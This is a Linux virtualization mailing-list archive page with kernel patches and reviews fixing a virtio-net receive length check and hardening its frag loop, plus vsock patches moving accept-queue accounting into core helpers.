Linux virtualization list
 help / color / mirror / Atom feed
* Re: [PATCH net v2 2/2] virtio-net: harden page_to_skb() big-packet frag loop
From: Xuan Zhuo @ 2026-06-11  2:40 UTC (permalink / raw)
  To: Xiang Mei
  Cc: andrew+netdev, davem, edumazet, kuba, pabeni, netdev,
	virtualization, linux-kernel, minhquangbui99, bestswngs, mst,
	jasowang, eperezma
In-Reply-To: <CAPpSM+RApuYf3-ui15E+01fWEzUzfh6mgijQyT_+KjusMVxMfw@mail.gmail.com>

On Wed, 10 Jun 2026 19:24:03 -0700, Xiang Mei <xmei5@asu.edu> wrote:
> Thanks for the review. I agree with that as I replied at the end of
> v1. If we obsolete 2/2 but keep 1/2, is it okay to just leave it as
> is?

You should post a new version.

Thanks.

>
> Xiang
>
> On Wed, Jun 10, 2026 at 7:19 PM Xuan Zhuo <xuanzhuo@linux.alibaba.com> wrote:
> >
> > On Wed, 10 Jun 2026 16:29:36 -0700, Xiang Mei <xmei5@asu.edu> wrote:
> > > This is a robustness hardening patch. The slow-path frag loop in
> > > page_to_skb() walks the page chain via page->private until the
> > > device-reported len is consumed, implicitly trusting that len fits the
> > > chain. It does not stop when the chain is exhausted (page becomes NULL
> > > at the tail), nor when nr_frags reaches the end of the static
> > > skb_shinfo()->frags[MAX_SKB_FRAGS] array.
> > >
> > > Both bounds are needed: the chain length is big_packets_num_skbfrags + 1
> > > pages, which for an MTU-driven configuration can be well below
> > > MAX_SKB_FRAGS, so neither guard implies the other.
> > >
> > > Make the loop self-defending so it no longer relies on the caller having
> > > validated len: stop once the chain is exhausted, and never index past
> > > MAX_SKB_FRAGS. No functional change for well-formed input.
> >
> > At this point, we are assuming that len represents the correct packet length. If
> > there is a bug in the validation, it can be fixed, just like in your previous
> > patch. Indeed, not checking nr_frags is also based on the overall design.
> > However, I do not recommend adding this kind of enhancement. If we follow
> > this logic, we would end up adding similar code in many other places, which
> > doesn't make much sense.
> >
> > Thanks.
> >
> > >
> > > Signed-off-by: Xiang Mei <xmei5@asu.edu>
> > > ---
> > > v2: robustness patch
> > >
> > >  drivers/net/virtio_net.c | 5 ++++-
> > >  1 file changed, 4 insertions(+), 1 deletion(-)
> > >
> > > diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
> > > index afe73eda1491..518c22fa1b68 100644
> > > --- a/drivers/net/virtio_net.c
> > > +++ b/drivers/net/virtio_net.c
> > > @@ -906,8 +906,11 @@ static struct sk_buff *page_to_skb(struct virtnet_info *vi,
> > >       }
> > >
> > >       BUG_ON(offset >= PAGE_SIZE);
> > > -     while (len) {
> > > +     while (len && page) {
> > >               unsigned int frag_size = min((unsigned)PAGE_SIZE - offset, len);
> > > +
> > > +             if (unlikely(skb_shinfo(skb)->nr_frags >= MAX_SKB_FRAGS))
> > > +                     break;
> > >               skb_add_rx_frag(skb, skb_shinfo(skb)->nr_frags, page, offset,
> > >                               frag_size, truesize);
> > >               len -= frag_size;
> > > --
> > > 2.43.0
> > >

^ permalink raw reply

* [PATCH net-next] vsock/vmci: use sk_acceptq_is_full() helper
From: Raf Dickson @ 2026-06-11  2:38 UTC (permalink / raw)
  To: netdev, virtualization
  Cc: pabeni, sgarzare, stefanha, bryan-bt.tan, vishnu.dasa,
	bcm-kernel-feedback-list, Raf Dickson

Replace the open-coded backlog check with sk_acceptq_is_full().
The helper uses > instead of >=, which is the correct comparison
per commit 64a146513f8f ("[NET]: Revert incorrect accept queue
backlog changes."), and adds READ_ONCE() for proper memory ordering.

Suggested-by: Stefano Garzarella <sgarzare@redhat.com>

Signed-off-by: Raf Dickson <rafdog35@gmail.com>
---
 net/vmw_vsock/vmci_transport.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/net/vmw_vsock/vmci_transport.c b/net/vmw_vsock/vmci_transport.c
index 91516488a7..56503bee31 100644
--- a/net/vmw_vsock/vmci_transport.c
+++ b/net/vmw_vsock/vmci_transport.c
@@ -1010,7 +1010,7 @@ static int vmci_transport_recv_listen(struct sock *sk,
 	 * reset.  Otherwise we create and initialize a child socket and reply
 	 * with a connection negotiation.
 	 */
-	if (sk->sk_ack_backlog >= sk->sk_max_ack_backlog) {
+	if (sk_acceptq_is_full(sk)) {
 		vmci_transport_reply_reset(pkt);
 		return -ECONNREFUSED;
 	}
-- 
2.54.0


^ permalink raw reply related

* Re: [PATCH net v2 2/2] virtio-net: harden page_to_skb() big-packet frag loop
From: Xiang Mei @ 2026-06-11  2:24 UTC (permalink / raw)
  To: Xuan Zhuo
  Cc: andrew+netdev, davem, edumazet, kuba, pabeni, netdev,
	virtualization, linux-kernel, minhquangbui99, bestswngs, mst,
	jasowang, eperezma
In-Reply-To: <1781144329.8069873-2-xuanzhuo@linux.alibaba.com>

Thanks for the review. I agree with that as I replied at the end of
v1. If we obsolete 2/2 but keep 1/2, is it okay to just leave it as
is?

Xiang

On Wed, Jun 10, 2026 at 7:19 PM Xuan Zhuo <xuanzhuo@linux.alibaba.com> wrote:
>
> On Wed, 10 Jun 2026 16:29:36 -0700, Xiang Mei <xmei5@asu.edu> wrote:
> > This is a robustness hardening patch. The slow-path frag loop in
> > page_to_skb() walks the page chain via page->private until the
> > device-reported len is consumed, implicitly trusting that len fits the
> > chain. It does not stop when the chain is exhausted (page becomes NULL
> > at the tail), nor when nr_frags reaches the end of the static
> > skb_shinfo()->frags[MAX_SKB_FRAGS] array.
> >
> > Both bounds are needed: the chain length is big_packets_num_skbfrags + 1
> > pages, which for an MTU-driven configuration can be well below
> > MAX_SKB_FRAGS, so neither guard implies the other.
> >
> > Make the loop self-defending so it no longer relies on the caller having
> > validated len: stop once the chain is exhausted, and never index past
> > MAX_SKB_FRAGS. No functional change for well-formed input.
>
> At this point, we are assuming that len represents the correct packet length. If
> there is a bug in the validation, it can be fixed, just like in your previous
> patch. Indeed, not checking nr_frags is also based on the overall design.
> However, I do not recommend adding this kind of enhancement. If we follow
> this logic, we would end up adding similar code in many other places, which
> doesn't make much sense.
>
> Thanks.
>
> >
> > Signed-off-by: Xiang Mei <xmei5@asu.edu>
> > ---
> > v2: robustness patch
> >
> >  drivers/net/virtio_net.c | 5 ++++-
> >  1 file changed, 4 insertions(+), 1 deletion(-)
> >
> > diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
> > index afe73eda1491..518c22fa1b68 100644
> > --- a/drivers/net/virtio_net.c
> > +++ b/drivers/net/virtio_net.c
> > @@ -906,8 +906,11 @@ static struct sk_buff *page_to_skb(struct virtnet_info *vi,
> >       }
> >
> >       BUG_ON(offset >= PAGE_SIZE);
> > -     while (len) {
> > +     while (len && page) {
> >               unsigned int frag_size = min((unsigned)PAGE_SIZE - offset, len);
> > +
> > +             if (unlikely(skb_shinfo(skb)->nr_frags >= MAX_SKB_FRAGS))
> > +                     break;
> >               skb_add_rx_frag(skb, skb_shinfo(skb)->nr_frags, page, offset,
> >                               frag_size, truesize);
> >               len -= frag_size;
> > --
> > 2.43.0
> >

^ permalink raw reply

* Re: [PATCH net v2 2/2] virtio-net: harden page_to_skb() big-packet frag loop
From: Xuan Zhuo @ 2026-06-11  2:18 UTC (permalink / raw)
  To: Xiang Mei
  Cc: andrew+netdev, davem, edumazet, kuba, pabeni, netdev,
	virtualization, linux-kernel, minhquangbui99, bestswngs,
	Xiang Mei, mst, jasowang, eperezma
In-Reply-To: <20260610232936.1176094-2-xmei5@asu.edu>

On Wed, 10 Jun 2026 16:29:36 -0700, Xiang Mei <xmei5@asu.edu> wrote:
> This is a robustness hardening patch. The slow-path frag loop in
> page_to_skb() walks the page chain via page->private until the
> device-reported len is consumed, implicitly trusting that len fits the
> chain. It does not stop when the chain is exhausted (page becomes NULL
> at the tail), nor when nr_frags reaches the end of the static
> skb_shinfo()->frags[MAX_SKB_FRAGS] array.
>
> Both bounds are needed: the chain length is big_packets_num_skbfrags + 1
> pages, which for an MTU-driven configuration can be well below
> MAX_SKB_FRAGS, so neither guard implies the other.
>
> Make the loop self-defending so it no longer relies on the caller having
> validated len: stop once the chain is exhausted, and never index past
> MAX_SKB_FRAGS. No functional change for well-formed input.

At this point, we are assuming that len represents the correct packet length. If
there is a bug in the validation, it can be fixed, just like in your previous
patch. Indeed, not checking nr_frags is also based on the overall design.
However, I do not recommend adding this kind of enhancement. If we follow
this logic, we would end up adding similar code in many other places, which
doesn't make much sense.

Thanks.

>
> Signed-off-by: Xiang Mei <xmei5@asu.edu>
> ---
> v2: robustness patch
>
>  drivers/net/virtio_net.c | 5 ++++-
>  1 file changed, 4 insertions(+), 1 deletion(-)
>
> diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
> index afe73eda1491..518c22fa1b68 100644
> --- a/drivers/net/virtio_net.c
> +++ b/drivers/net/virtio_net.c
> @@ -906,8 +906,11 @@ static struct sk_buff *page_to_skb(struct virtnet_info *vi,
>  	}
>
>  	BUG_ON(offset >= PAGE_SIZE);
> -	while (len) {
> +	while (len && page) {
>  		unsigned int frag_size = min((unsigned)PAGE_SIZE - offset, len);
> +
> +		if (unlikely(skb_shinfo(skb)->nr_frags >= MAX_SKB_FRAGS))
> +			break;
>  		skb_add_rx_frag(skb, skb_shinfo(skb)->nr_frags, page, offset,
>  				frag_size, truesize);
>  		len -= frag_size;
> --
> 2.43.0
>

^ permalink raw reply

* [PATCH net-next v2 2/2] vsock: fold sk_acceptq_removed() into vsock_remove_pending()
From: Raf Dickson @ 2026-06-11  2:13 UTC (permalink / raw)
  To: netdev, virtualization
  Cc: pabeni, sgarzare, stefanha, bryan-bt.tan, vishnu.dasa,
	bcm-kernel-feedback-list, bobbyeshleman, Raf Dickson
In-Reply-To: <20260611021317.69362-1-rafdog35@gmail.com>

Callers of vsock_remove_pending() must also call sk_acceptq_removed()
to keep sk_ack_backlog consistent. Move the call into
vsock_remove_pending() itself to make it automatic and prevent future
callers from forgetting it.

Suggested-by: Stefano Garzarella <sgarzare@redhat.com>
Signed-off-by: Raf Dickson <rafdog35@gmail.com>
---
 net/vmw_vsock/af_vsock.c       | 3 +--
 net/vmw_vsock/vmci_transport.c | 5 +----
 2 files changed, 2 insertions(+), 6 deletions(-)

diff --git a/net/vmw_vsock/af_vsock.c b/net/vmw_vsock/af_vsock.c
index 73e6416ee9..b9772a0205 100644
--- a/net/vmw_vsock/af_vsock.c
+++ b/net/vmw_vsock/af_vsock.c
@@ -493,6 +493,7 @@ void vsock_remove_pending(struct sock *listener, struct sock *pending)
 	list_del_init(&vpending->pending_links);
 	sock_put(listener);
 	sock_put(pending);
+	sk_acceptq_removed(listener);
 }
 EXPORT_SYMBOL_GPL(vsock_remove_pending);
 
@@ -761,8 +762,6 @@ static void vsock_pending_work(struct work_struct *work)
 
 	if (vsock_is_pending(sk)) {
 		vsock_remove_pending(listener, sk);
-
-		sk_acceptq_removed(listener);
 	} else if (!vsk->rejected) {
 		/* We are not on the pending list and accept() did not reject
 		 * us, so we must have been accepted by our user process.  We
diff --git a/net/vmw_vsock/vmci_transport.c b/net/vmw_vsock/vmci_transport.c
index 91516488a7..a417403c8d 100644
--- a/net/vmw_vsock/vmci_transport.c
+++ b/net/vmw_vsock/vmci_transport.c
@@ -980,11 +980,8 @@ static int vmci_transport_recv_listen(struct sock *sk,
 			err = -EINVAL;
 		}
 
-		if (err < 0) {
+		if (err < 0)
 			vsock_remove_pending(sk, pending);
-			sk_acceptq_removed(sk);
-		}
-
 		release_sock(pending);
 		vmci_transport_release_pending(pending);
 
-- 
2.54.0


^ permalink raw reply related

* [PATCH net-next v2 1/2] vsock: fold sk_acceptq_added() into vsock_enqueue_accept()
From: Raf Dickson @ 2026-06-11  2:13 UTC (permalink / raw)
  To: netdev, virtualization
  Cc: pabeni, sgarzare, stefanha, bryan-bt.tan, vishnu.dasa,
	bcm-kernel-feedback-list, bobbyeshleman, Raf Dickson
In-Reply-To: <20260611021317.69362-1-rafdog35@gmail.com>

virtio and hyperv call sk_acceptq_added() immediately before
vsock_enqueue_accept(). Move the call into vsock_enqueue_accept()
itself so callers cannot forget it and the accounting is consistent.

vmci is left unchanged as sk_acceptq_added() there pairs with
vsock_add_pending(), not vsock_enqueue_accept(), since connections
can be cleaned up by the pending work timer before ever reaching
vsock_enqueue_accept().

Suggested-by: Paolo Abeni <pabeni@redhat.com>
Suggested-by: Stefano Garzarella <sgarzare@redhat.com>

Signed-off-by: Raf Dickson <rafdog35@gmail.com>
---
 net/vmw_vsock/af_vsock.c                | 1 +
 net/vmw_vsock/hyperv_transport.c        | 1 -
 net/vmw_vsock/virtio_transport_common.c | 1 -
 3 files changed, 1 insertion(+), 2 deletions(-)

diff --git a/net/vmw_vsock/af_vsock.c b/net/vmw_vsock/af_vsock.c
index 2ce1063d4a..73e6416ee9 100644
--- a/net/vmw_vsock/af_vsock.c
+++ b/net/vmw_vsock/af_vsock.c
@@ -507,6 +507,7 @@ void vsock_enqueue_accept(struct sock *listener, struct sock *connected)
 	sock_hold(connected);
 	sock_hold(listener);
 	list_add_tail(&vconnected->accept_queue, &vlistener->accept_queue);
+	sk_acceptq_added(listener);
 }
 EXPORT_SYMBOL_GPL(vsock_enqueue_accept);
 
diff --git a/net/vmw_vsock/hyperv_transport.c b/net/vmw_vsock/hyperv_transport.c
index b3394946b2..0de8148877 100644
--- a/net/vmw_vsock/hyperv_transport.c
+++ b/net/vmw_vsock/hyperv_transport.c
@@ -410,7 +410,6 @@ static void hvs_open_connection(struct vmbus_channel *chan)
 
 	if (conn_from_host) {
 		new->sk_state = TCP_ESTABLISHED;
-		sk_acceptq_added(sk);
 
 		hvs_new->vm_srv_id = *if_type;
 		hvs_new->host_srv_id = *if_instance;
diff --git a/net/vmw_vsock/virtio_transport_common.c b/net/vmw_vsock/virtio_transport_common.c
index b10666937c..4a39d48db9 100644
--- a/net/vmw_vsock/virtio_transport_common.c
+++ b/net/vmw_vsock/virtio_transport_common.c
@@ -1582,7 +1582,6 @@ virtio_transport_recv_listen(struct sock *sk, struct sk_buff *skb,
 		return ret;
 	}
 
-	sk_acceptq_added(sk);
 	if (virtio_transport_space_update(child, skb))
 		child->sk_write_space(child);
 
-- 
2.54.0


^ permalink raw reply related

* [PATCH net-next v2 0/2] vsock: fold acceptq accounting into core helpers
From: Raf Dickson @ 2026-06-11  2:13 UTC (permalink / raw)
  To: netdev, virtualization
  Cc: pabeni, sgarzare, stefanha, bryan-bt.tan, vishnu.dasa,
	bcm-kernel-feedback-list, bobbyeshleman, Raf Dickson

These two patches follow up on commit c05fa14db43e
("vsock/vmci: fix sk_ack_backlog leak on failed handshake")
by folding sk_acceptq_added() and sk_acceptq_removed() into
vsock_enqueue_accept() and vsock_remove_pending() respectively,
as suggested by Paolo Abeni and Stefano Garzarella.

Changes since v1:
  - Keep sk_acceptq_added() explicit in vmci, where it pairs with
    vsock_add_pending() rather than vsock_enqueue_accept() (Bobby Eshleman)

Link: https://lore.kernel.org/netdev/20260610091121.213324-1-rafdog35@gmail.com/


Raf Dickson (2):
  vsock: fold sk_acceptq_added() into vsock_enqueue_accept()
  vsock: fold sk_acceptq_removed() into vsock_remove_pending()

 net/vmw_vsock/af_vsock.c                | 4 ++--
 net/vmw_vsock/hyperv_transport.c        | 1 -
 net/vmw_vsock/virtio_transport_common.c | 1 -
 net/vmw_vsock/vmci_transport.c          | 5 +----
 4 files changed, 3 insertions(+), 8 deletions(-)

-- 
2.54.0


^ permalink raw reply

* Re: [PATCH net v2 1/2] virtio-net: fix len check in receive_big()
From: Xuan Zhuo @ 2026-06-11  1:55 UTC (permalink / raw)
  To: Xiang Mei
  Cc: andrew+netdev, davem, edumazet, kuba, pabeni, netdev,
	virtualization, linux-kernel, minhquangbui99, bestswngs,
	Xiang Mei, mst, jasowang, eperezma
In-Reply-To: <20260610232936.1176094-1-xmei5@asu.edu>

On Wed, 10 Jun 2026 16:29:35 -0700, Xiang Mei <xmei5@asu.edu> wrote:
> receive_big() bounds the device-announced length by
> (big_packets_num_skbfrags + 1) * PAGE_SIZE.  That is still too loose:
> add_recvbuf_big() sets sg[1] to start at offset
> sizeof(struct padded_vnet_hdr) into the first page, so the chain
> actually carries hdr_len + (PAGE_SIZE - sizeof(padded_vnet_hdr)) +
> big_packets_num_skbfrags * PAGE_SIZE bytes -- 20 bytes less than the
> check allows for the common hdr_len == 12 case.
>
> A malicious virtio backend can announce a len in that gap.  page_to_skb()
> then walks one frag past the page chain, storing a NULL page->private
> into skb_shinfo()->frags[MAX_SKB_FRAGS], which is both an out-of-bounds
> write past the static frag array and a NULL frag handed up the rx path.
>
> Bound len by the size add_recvbuf_big() actually advertised.
>
> Fixes: 0c716703965f ("virtio-net: fix received length check in big packets")
> Reported-by: Weiming Shi <bestswngs@gmail.com>
> Signed-off-by: Xiang Mei <xmei5@asu.edu>

Reviewed-by: Xuan Zhuo <xuanzhuo@linux.alibaba.com>

> ---
> v2: add 2/2 for robustness
>
>  drivers/net/virtio_net.c | 8 +++++---
>  1 file changed, 5 insertions(+), 3 deletions(-)
>
> diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
> index f4adcfee7a80..afe73eda1491 100644
> --- a/drivers/net/virtio_net.c
> +++ b/drivers/net/virtio_net.c
> @@ -1999,15 +1999,17 @@ static struct sk_buff *receive_big(struct net_device *dev,
>  				   struct virtnet_rq_stats *stats)
>  {
>  	struct page *page = buf;
> +	unsigned long max_len;
>  	struct sk_buff *skb;
>
>  	/* Make sure that len does not exceed the size allocated in
>  	 * add_recvbuf_big.
>  	 */
> -	if (unlikely(len > (vi->big_packets_num_skbfrags + 1) * PAGE_SIZE)) {
> +	max_len = vi->hdr_len + (PAGE_SIZE - sizeof(struct padded_vnet_hdr)) +
> +		  vi->big_packets_num_skbfrags * PAGE_SIZE;
> +	if (unlikely(len > max_len)) {
>  		pr_debug("%s: rx error: len %u exceeds allocated size %lu\n",
> -			 dev->name, len,
> -			 (vi->big_packets_num_skbfrags + 1) * PAGE_SIZE);
> +			 dev->name, len, max_len);
>  		goto err;
>  	}
>
> --
> 2.43.0
>

^ permalink raw reply

* Re: [PATCH net-next 1/2] vsock: fold sk_acceptq_added() into vsock_enqueue_accept()
From: Raf Dickson @ 2026-06-11  1:43 UTC (permalink / raw)
  To: bobbyeshleman
  Cc: netdev, virtualization, pabeni, sgarzare, stefanha, bryan-bt.tan,
	vishnu.dasa, bcm-kernel-feedback-list
In-Reply-To: <ainvZQppoc7LfPRs@devvm29614.prn0.facebook.com>

On Wed, Jun 10, 2026 at 16:12:37 -0700, Bobby Eshleman wrote:
> It looks like vmci might be an odd duck here, where sk_acceptq_added
> actually pairs with vsock_add_pending(), instead of
> vsock_enqueue_accept()...
>
> For example, if the pending work timer below fires, vsock_pending_work()
> will see vsock_is_pending() is true, and then hit sk_acceptq_removed()
> and underflow the zero backlog counter?

You're right, thank you for catching that. In vmci sk_acceptq_added()
pairs with vsock_add_pending(), not vsock_enqueue_accept(), so moving
it would cause an underflow when the pending work timer fires without
a successful connection. Patch 2/2 is unaffected.

I'll send a v2 that keeps the vmci call site as-is and only folds
the virtio and hyperv sites into vsock_enqueue_accept().

Raf

^ permalink raw reply

* Re: [PATCH net] virtio-net: fix len check in receive_big()
From: Xiang Mei @ 2026-06-10 23:35 UTC (permalink / raw)
  To: Michael S. Tsirkin
  Cc: jasowang, xuanzhuo, eperezma, andrew+netdev, davem, edumazet,
	kuba, pabeni, netdev, virtualization, linux-kernel,
	minhquangbui99, bestswngs
In-Reply-To: <20260610181911-mutt-send-email-mst@kernel.org>

On Wed, Jun 10, 2026 at 06:21:49PM -0400, Michael S. Tsirkin wrote:
> On Wed, Jun 10, 2026 at 03:16:06PM -0700, Xiang Mei wrote:
> > receive_big() bounds the device-announced length by
> > (big_packets_num_skbfrags + 1) * PAGE_SIZE.  That is still too loose:
> > add_recvbuf_big() sets sg[1] to start at offset
> > sizeof(struct padded_vnet_hdr) into the first page, so the chain
> > actually carries hdr_len + (PAGE_SIZE - sizeof(padded_vnet_hdr)) +
> > big_packets_num_skbfrags * PAGE_SIZE bytes -- 20 bytes less than the
> > check allows for the common hdr_len == 12 case.
> > 
> > A malicious virtio backend can announce a len in that gap.  page_to_skb()
> > then walks one frag past the page chain, storing a NULL page->private
> > into skb_shinfo()->frags[MAX_SKB_FRAGS], which is both an out-of-bounds
> > write past the static frag array and a NULL frag handed up the rx path.
> > Bound len by the size add_recvbuf_big() actually advertised.
> > 
> > Fixes: 0c716703965f ("virtio-net: fix received length check in big packets")
> > Reported-by: Weiming Shi <bestswngs@gmail.com>
> > Signed-off-by: Xiang Mei <xmei5@asu.edu>
> 
> Let's instead (or additionally?), bound the frags array index.

I went with "additionally" rather than "instead": 1/2 restores the
length invariant in receive_big(), and 2/2 makes the frag loop
self-defending so it no longer depends on the caller validating len.

I didn't find a case triggering the issue of 2/2 so I could not produce
a PoC that actually crashes the kernel through 2/2's path independently
of the 1/2 bug. With 1/2 applied, the over-long len is rejected before
the loop, so the guard is never exercised by a real trigger I could find.

So 2/2 is defense-in-depth rather than a demonstrated separate bug.
Please feel free to decide whether it's worth taking. A v2 was sent.

Thanks,
Xiang
> 
> Seems more robust.
> 
> > ---
> >  drivers/net/virtio_net.c | 8 +++++---
> >  1 file changed, 5 insertions(+), 3 deletions(-)
> > 
> > diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
> > index f4adcfee7a80..afe73eda1491 100644
> > --- a/drivers/net/virtio_net.c
> > +++ b/drivers/net/virtio_net.c
> > @@ -1999,15 +1999,17 @@ static struct sk_buff *receive_big(struct net_device *dev,
> >  				   struct virtnet_rq_stats *stats)
> >  {
> >  	struct page *page = buf;
> > +	unsigned long max_len;
> >  	struct sk_buff *skb;
> >  
> >  	/* Make sure that len does not exceed the size allocated in
> >  	 * add_recvbuf_big.
> >  	 */
> > -	if (unlikely(len > (vi->big_packets_num_skbfrags + 1) * PAGE_SIZE)) {
> > +	max_len = vi->hdr_len + (PAGE_SIZE - sizeof(struct padded_vnet_hdr)) +
> > +		  vi->big_packets_num_skbfrags * PAGE_SIZE;
> > +	if (unlikely(len > max_len)) {
> >  		pr_debug("%s: rx error: len %u exceeds allocated size %lu\n",
> > -			 dev->name, len,
> > -			 (vi->big_packets_num_skbfrags + 1) * PAGE_SIZE);
> > +			 dev->name, len, max_len);
> >  		goto err;
> >  	}
> >  
> > -- 
> > 2.43.0
> 

^ permalink raw reply

* [PATCH net v2 2/2] virtio-net: harden page_to_skb() big-packet frag loop
From: Xiang Mei @ 2026-06-10 23:29 UTC (permalink / raw)
  To: mst, jasowang, xuanzhuo, eperezma
  Cc: andrew+netdev, davem, edumazet, kuba, pabeni, netdev,
	virtualization, linux-kernel, minhquangbui99, bestswngs,
	Xiang Mei
In-Reply-To: <20260610232936.1176094-1-xmei5@asu.edu>

This is a robustness hardening patch. The slow-path frag loop in
page_to_skb() walks the page chain via page->private until the
device-reported len is consumed, implicitly trusting that len fits the
chain. It does not stop when the chain is exhausted (page becomes NULL
at the tail), nor when nr_frags reaches the end of the static
skb_shinfo()->frags[MAX_SKB_FRAGS] array.

Both bounds are needed: the chain length is big_packets_num_skbfrags + 1
pages, which for an MTU-driven configuration can be well below
MAX_SKB_FRAGS, so neither guard implies the other.

Make the loop self-defending so it no longer relies on the caller having
validated len: stop once the chain is exhausted, and never index past
MAX_SKB_FRAGS. No functional change for well-formed input.

Signed-off-by: Xiang Mei <xmei5@asu.edu>
---
v2: robustness patch

 drivers/net/virtio_net.c | 5 ++++-
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
index afe73eda1491..518c22fa1b68 100644
--- a/drivers/net/virtio_net.c
+++ b/drivers/net/virtio_net.c
@@ -906,8 +906,11 @@ static struct sk_buff *page_to_skb(struct virtnet_info *vi,
 	}
 
 	BUG_ON(offset >= PAGE_SIZE);
-	while (len) {
+	while (len && page) {
 		unsigned int frag_size = min((unsigned)PAGE_SIZE - offset, len);
+
+		if (unlikely(skb_shinfo(skb)->nr_frags >= MAX_SKB_FRAGS))
+			break;
 		skb_add_rx_frag(skb, skb_shinfo(skb)->nr_frags, page, offset,
 				frag_size, truesize);
 		len -= frag_size;
-- 
2.43.0


^ permalink raw reply related

* [PATCH net v2 1/2] virtio-net: fix len check in receive_big()
From: Xiang Mei @ 2026-06-10 23:29 UTC (permalink / raw)
  To: mst, jasowang, xuanzhuo, eperezma
  Cc: andrew+netdev, davem, edumazet, kuba, pabeni, netdev,
	virtualization, linux-kernel, minhquangbui99, bestswngs,
	Xiang Mei

receive_big() bounds the device-announced length by
(big_packets_num_skbfrags + 1) * PAGE_SIZE.  That is still too loose:
add_recvbuf_big() sets sg[1] to start at offset
sizeof(struct padded_vnet_hdr) into the first page, so the chain
actually carries hdr_len + (PAGE_SIZE - sizeof(padded_vnet_hdr)) +
big_packets_num_skbfrags * PAGE_SIZE bytes -- 20 bytes less than the
check allows for the common hdr_len == 12 case.

A malicious virtio backend can announce a len in that gap.  page_to_skb()
then walks one frag past the page chain, storing a NULL page->private
into skb_shinfo()->frags[MAX_SKB_FRAGS], which is both an out-of-bounds
write past the static frag array and a NULL frag handed up the rx path.

Bound len by the size add_recvbuf_big() actually advertised.

Fixes: 0c716703965f ("virtio-net: fix received length check in big packets")
Reported-by: Weiming Shi <bestswngs@gmail.com>
Signed-off-by: Xiang Mei <xmei5@asu.edu>
---
v2: add 2/2 for robustness

 drivers/net/virtio_net.c | 8 +++++---
 1 file changed, 5 insertions(+), 3 deletions(-)

diff --git a/drivers/net/virtio_net.c b/drivers/net/virtio_net.c
index f4adcfee7a80..afe73eda1491 100644
--- a/drivers/net/virtio_net.c
+++ b/drivers/net/virtio_net.c
@@ -1999,15 +1999,17 @@ static struct sk_buff *receive_big(struct net_device *dev,
 				   struct virtnet_rq_stats *stats)
 {
 	struct page *page = buf;
+	unsigned long max_len;
 	struct sk_buff *skb;
 
 	/* Make sure that len does not exceed the size allocated in
 	 * add_recvbuf_big.
 	 */
-	if (unlikely(len > (vi->big_packets_num_skbfrags + 1) * PAGE_SIZE)) {
+	max_len = vi->hdr_len + (PAGE_SIZE - sizeof(struct padded_vnet_hdr)) +
+		  vi->big_packets_num_skbfrags * PAGE_SIZE;
+	if (unlikely(len > max_len)) {
 		pr_debug("%s: rx error: len %u exceeds allocated size %lu\n",
-			 dev->name, len,
-			 (vi->big_packets_num_skbfrags + 1) * PAGE_SIZE);
+			 dev->name, len, max_len);
 		goto err;
 	}
 
-- 
2.43.0


^ permalink raw reply related

* Re: [PATCH net-next 1/2] vsock: fold sk_acceptq_added() into vsock_enqueue_accept()
From: Bobby Eshleman @ 2026-06-10 23:12 UTC (permalink / raw)
  To: Raf Dickson
  Cc: netdev, virtualization, pabeni, sgarzare, stefanha, bryan-bt.tan,
	vishnu.dasa, bcm-kernel-feedback-list
In-Reply-To: <20260610091121.213324-2-rafdog35@gmail.com>

On Wed, Jun 10, 2026 at 09:11:20AM +0000, Raf Dickson wrote:
> All three transports (vmci, virtio, hyperv) call sk_acceptq_added()
> immediately before vsock_enqueue_accept(). Move the call into
> vsock_enqueue_accept() itself so callers cannot forget it and the
> accounting is always consistent.
> 
> Suggested-by: Paolo Abeni <pabeni@redhat.com>
> Suggested-by: Stefano Garzarella <sgarzare@redhat.com>
> 
> Signed-off-by: Raf Dickson <rafdog35@gmail.com>
> ---
>  net/vmw_vsock/af_vsock.c                | 1 +
>  net/vmw_vsock/hyperv_transport.c        | 1 -
>  net/vmw_vsock/virtio_transport_common.c | 1 -
>  net/vmw_vsock/vmci_transport.c          | 1 -
>  4 files changed, 1 insertion(+), 3 deletions(-)
> 
> diff --git a/net/vmw_vsock/af_vsock.c b/net/vmw_vsock/af_vsock.c
> index 2ce1063d4a..73e6416ee9 100644
> --- a/net/vmw_vsock/af_vsock.c
> +++ b/net/vmw_vsock/af_vsock.c
> @@ -507,6 +507,7 @@ void vsock_enqueue_accept(struct sock *listener, struct sock *connected)
>  	sock_hold(connected);
>  	sock_hold(listener);
>  	list_add_tail(&vconnected->accept_queue, &vlistener->accept_queue);
> +	sk_acceptq_added(listener);
>  }
>  EXPORT_SYMBOL_GPL(vsock_enqueue_accept);
>  
> diff --git a/net/vmw_vsock/hyperv_transport.c b/net/vmw_vsock/hyperv_transport.c
> index b3394946b2..0de8148877 100644
> --- a/net/vmw_vsock/hyperv_transport.c
> +++ b/net/vmw_vsock/hyperv_transport.c
> @@ -410,7 +410,6 @@ static void hvs_open_connection(struct vmbus_channel *chan)
>  
>  	if (conn_from_host) {
>  		new->sk_state = TCP_ESTABLISHED;
> -		sk_acceptq_added(sk);
>  
>  		hvs_new->vm_srv_id = *if_type;
>  		hvs_new->host_srv_id = *if_instance;
> diff --git a/net/vmw_vsock/virtio_transport_common.c b/net/vmw_vsock/virtio_transport_common.c
> index b10666937c..4a39d48db9 100644
> --- a/net/vmw_vsock/virtio_transport_common.c
> +++ b/net/vmw_vsock/virtio_transport_common.c
> @@ -1582,7 +1582,6 @@ virtio_transport_recv_listen(struct sock *sk, struct sk_buff *skb,
>  		return ret;
>  	}
>  
> -	sk_acceptq_added(sk);
>  	if (virtio_transport_space_update(child, skb))
>  		child->sk_write_space(child);
>  
> diff --git a/net/vmw_vsock/vmci_transport.c b/net/vmw_vsock/vmci_transport.c
> index 91516488a7..4ce6660c11 100644
> --- a/net/vmw_vsock/vmci_transport.c
> +++ b/net/vmw_vsock/vmci_transport.c
> @@ -1109,7 +1109,6 @@ static int vmci_transport_recv_listen(struct sock *sk,
>  	}
>  
>  	vsock_add_pending(sk, pending);
> -	sk_acceptq_added(sk);

It looks like vmci might be an odd duck here, where sk_acceptq_added
actually pairs with vsock_add_pending(), instead of
vsock_enqueue_accept()...

